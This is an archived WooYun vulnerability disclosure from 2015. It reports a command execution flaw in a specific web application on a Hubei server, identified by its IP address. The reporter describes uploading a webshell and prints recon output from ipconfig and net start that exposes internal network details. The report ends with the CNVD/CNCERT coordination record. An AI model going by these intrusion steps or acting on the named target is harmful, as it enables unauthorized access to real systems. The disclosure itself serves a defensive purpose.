乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-29: 细节已通知厂商并且等待厂商处理中 2015-07-03: 厂商已经确认,细节仅向厂商公开 2015-07-13: 细节向核心白帽子及相关领域专家公开 2015-07-23: 细节向普通白帽子公开 2015-08-02: 细节向实习白帽子公开 2015-08-17: 细节向公众公开
地址http://27.17.18.107:8080/GTJY_HB/resslist_page.action;jsessionid=00C7D1D1D55692B706D448BFAA5664E6?currentPage=2存在命令执行漏洞
传马看内网服务器情况
ipconfig/all
Windows IP 配置 主机名 . . . . . . . . . . . . . : WIN-0G3HSJQRDIP 主 DNS 后缀 . . . . . . . . . . . : 节点类型 . . . . . . . . . . . . : 混合 IP 路由已启用 . . . . . . . . . . : 否 WINS 代理已启用 . . . . . . . . . : 否以太网适配器 本地连接 4: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Intel(R) 82576 Gigabit Dual Port Network Connection #4 物理地址. . . . . . . . . . . . . : 00-25-90-12-63-A9 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地址. . . . . . . . : fe80::b15c:4b68:7ef7:3ef3%13(首选) IPv4 地址 . . . . . . . . . . . . : 192.169.2.5(首选) 子网掩码 . . . . . . . . . . . . : 255.255.255.0 默认网关. . . . . . . . . . . . . : 192.169.2.1 DHCPv6 IAID . . . . . . . . . . . : 369108368 DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-16-C5-90-F9-00-25-90-12-63-A6 DNS 服务器 . . . . . . . . . . . : 202.103.24.68 TCPIP 上的 NetBIOS . . . . . . . : 已启用隧道适配器 本地连接* 8: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : isatap.{0114C2D2-B289-43A2-BB17-2125533013D6} 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 本地连接* 9: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : 6TO4 Adapter 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 IPv6 地址 . . . . . . . . . . . . : 2002:c0a9:205::c0a9:205(首选) 默认网关. . . . . . . . . . . . . : 2002:c058:6301::c058:6301 DNS 服务器 . . . . . . . . . . . : 202.103.24.68 TCPIP 上的 NetBIOS . . . . . . . : 已禁用隧道适配器 本地连接* 14: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface 物理地址. . . . . . . . . . . . . : 02-00-54-55-4E-01 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是
net start
已经启动以下 Windows 服务: Application Experience Background Intelligent Transfer Service Base Filtering Engine Certificate Propagation COM+ Event System Cryptographic Services DB2 Management Service (TACOM30) DCOM Server Process Launcher Desktop Window Manager Session Manager DHCP Client Diagnostic Policy Service Diagnostic System Host Distributed Link Tracking Client Distributed Transaction Coordinator DNS Client Function Discovery Resource Publication Group Policy Client Human Interface Device Access IKE and AuthIP IPsec Keying Modules IP Helper IPsec Policy Agent KtmRm for Distributed Transaction Coordinator Network Connections Network List Service Network Location Awareness Network Store Interface Service Plug and Play Print Spooler Remote Access Connection Manager Remote Procedure Call (RPC) Remote Registry Secondary Logon Secure Socket Tunneling Protocol Service Security Accounts Manager Server Shell Hardware Detection Software Licensing System Event Notification Service Task Scheduler TCP/IP NetBIOS Helper Telephony Terminal Services Terminal Services Configuration Terminal Services UserMode Port Redirector User Profile Service Windows Error Reporting Service Windows Event Log Windows Firewall Windows Management Instrumentation Windows Remote Management (WS-Management) Windows Time Windows Update Workstation命令成功完成。
不用数字证书也能进系统且把服务器拿下,呵呵。
加强安全意识
危害等级:中
漏洞Rank:7
确认时间:2015-07-03 12:04
CNVD确认并复现所述情况,已经转由CNCERT下发给湖北分中心,由其后续协调网站管理单位处置.
暂无